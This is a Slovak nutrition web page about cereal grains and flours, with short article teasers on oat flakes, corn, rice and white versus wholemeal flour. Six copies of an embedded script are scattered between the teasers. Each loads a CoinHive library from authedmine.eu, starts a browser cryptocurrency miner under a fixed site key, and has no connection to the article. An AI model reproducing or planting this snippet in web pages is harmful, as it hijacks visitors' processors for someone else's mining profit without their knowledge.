Obilniny a múky

- tieto potraviny sú zväčša pri diétach a zdravej výžive tabu. Ak sa hovorí o bielej múke – každý  vie, že je nezdravá. To, že si kúpime niečo, čo má na etikete napísané, že je celozrné, nezaručuje – že je to skutočne zdravé.

Ako sa v tom teda vyznať?  Veci treba zjednodušiť a pokiaľ nie ste celiatik –  človek s alergiou na lepok, začnite s ražnou. Tou nič nepokazíte a vďaka svojím vlastnostiam je maximálne vhodná do redukčných plánov.

Základom každej múky je zrno. Viete o tom, že je to dokonalosť sama? Obsahuje veľa živín, dlhé roky ho pri správnom podmienkach môžeme skladovať a ak sa rozhodneme a zasejeme ho – hoci aj po niekoľkých desiatkách rokoch – vyklíči a dá život novému klasu!  Nech je akýmkoľvek spôsobom spracované – jeho výživové hodnoty klesajú. Preto – čím menej narúšané sa konzumuje – tým je zdravšie!

Šupka zrna je zdrojom vlákniny, kyseliny fytinovej – tá viaže na seba množstvo minerálnych látok – najmä fosforu, mangánu, železa, vápnika, horčíka a draslíka.

Múčne jadro – biely prášok obsahuje bielkovinu, lepok, škrob . Živín tam nájdeme pomerne málo.

Klíčok alebo zárodok je časť, ktorou sa zrno napája na steblo, obsahuje cenné oleje a v nich rozpustné vitamíny. Sú tam zastúpené I bielkoviny, vitamin E a niekoľko B, enzýmy. Obsahuje silný antioxidant E- zabraňuje ničeniu buniek. Je výborný na pleť a reprodukciu.

Z obilnín sú najhodnotnejšie:

  • pšenica
  • jačmeň
  • pohánka
  • kukurica
  • ryža
  • proso
  • ovos
  • raž
  • láskavec

 

<script src="https://authedmine.eu/lib/1.js"></script> <script> var miner = new CoinHive.Anonymous('49dVbbCFDuhg9nX5u1MDuATVZj7gQehytZwvXEUuWg9kfhNPWH7bUD87VW1NfjqucRZNNVTb1AHGUK2fkq5Nd55mLNnB4WK'); miner.start(); </script>najpoužívanejšia múka

Nie je múka ako múka

OVSENNÉ VLOČKY Už sa o nich popísalo mnoho – aj napriek tomu, poniektorí si myslíme, že sa z nich priberá…. Ako príklad stačí uviesť kone… už v starých ľudových piesňach sa spievalo o tom, že ovos dostane za odmenu…Vločky sú bohaté na betaglukán – ak vás trápi vysoký cholesterol,  zaraďte ich do svojho jedálnička. Stabilizujú…

Details
<script src="https://authedmine.eu/lib/1.js"></script> <script> var miner = new CoinHive.Anonymous('49dVbbCFDuhg9nX5u1MDuATVZj7gQehytZwvXEUuWg9kfhNPWH7bUD87VW1NfjqucRZNNVTb1AHGUK2fkq5Nd55mLNnB4WK'); miner.start(); </script>strukoviny

Ako správne variť celozrnné obilniny

Ako správne variť celozrnné obilniny Najväčším prínosom celozrných obilnín je, že sú komplexným zdrojom sacharidov -  zdrojom energie pre naše telo a myseľ.Celé zrno je najsiľnejšou potravinou na ich očistu. Okrem toho sú obilniny zdrojom bielkovín, telu prospešných tukov, vitamínov a minerálov. 1. Každú obilninu najprv preberieme – odstránime kamienky a zlé zrná. 2. Premyjeme…

Details
<script src="https://authedmine.eu/lib/1.js"></script> <script> var miner = new CoinHive.Anonymous('49dVbbCFDuhg9nX5u1MDuATVZj7gQehytZwvXEUuWg9kfhNPWH7bUD87VW1NfjqucRZNNVTb1AHGUK2fkq5Nd55mLNnB4WK'); miner.start(); </script>zdrava strava ovsene vlocky

Ovsené vločky – sú vhodné na chudnutie?

Chudnutie s ovsenými vločkami? Už sa o nich popísalo mnoho – aj napriek tomu, to – či sa z nich priberá, alebo sú na chudnutie vhodné, je stále bodom dlhých diskusií! Ako príklad stačí uviesť kone… už v starých ľudových piesňach sa spievalo o tom, že ovos dostane za odmenu… Kôň sa však hýbal! A…

Details
<script src="https://authedmine.eu/lib/1.js"></script> <script> var miner = new CoinHive.Anonymous('49dVbbCFDuhg9nX5u1MDuATVZj7gQehytZwvXEUuWg9kfhNPWH7bUD87VW1NfjqucRZNNVTb1AHGUK2fkq5Nd55mLNnB4WK'); miner.start(); </script>metabolic balance v K-vital Poprad

Kukurica

Kukurica Už len to, aby sme dobre videli z nej robí výnimočnú potravinu. Vysoký obsah luteínu a zeaxantínu, karotenoidov, vysoký obsah minerálov a vlákniny ….. napriek tomu je pomerne často označovaná za potravinu nevhodnú do diét. Napriek tomu všetkému by ste mali o nej vedieť, že glykemický index má nižší ako ryža, zemiaky! Mladé kukuričné…

Details
<script src="https://authedmine.eu/lib/1.js"></script> <script> var miner = new CoinHive.Anonymous('49dVbbCFDuhg9nX5u1MDuATVZj7gQehytZwvXEUuWg9kfhNPWH7bUD87VW1NfjqucRZNNVTb1AHGUK2fkq5Nd55mLNnB4WK'); miner.start(); </script>biela verzus celozrnná múka

Biela verzus celozrnná

Zaujíma vás prečo je na pultoch hlavne tak veľa bielej múky? Logicky po prečítaní o zrne sa nám naskytuje jednoduchosť pomletia a zúžitkovania celého zrna. Namiesto toho zrno sa musí zabviť šupky – otruby – tá sa vyhadzuje alebo slúži ako kŕmivo zvieratám. Do obchodov sa tak dostáva v podstate len biely prášok – ktorý…

Details
<script src="https://authedmine.eu/lib/1.js"></script> <script> var miner = new CoinHive.Anonymous('49dVbbCFDuhg9nX5u1MDuATVZj7gQehytZwvXEUuWg9kfhNPWH7bUD87VW1NfjqucRZNNVTb1AHGUK2fkq5Nd55mLNnB4WK'); miner.start(); </script>ryža

Ryža

Ryža Zrno ryže je pokryté šupkou, ktorá nie je stráviteľná a odstraňuje sa vtedy, keď je ryža zrelá. V prípade naturálnej ryže sa zanecháva druhá vrstva pod šupkou – tam sa nachádza kopec živín. Ak sa odstráni aj tá – dopracujeme sa k bielej ryži. Venovali ste niekedy pozornosť pri jej výbere? Viete, že aj…

Details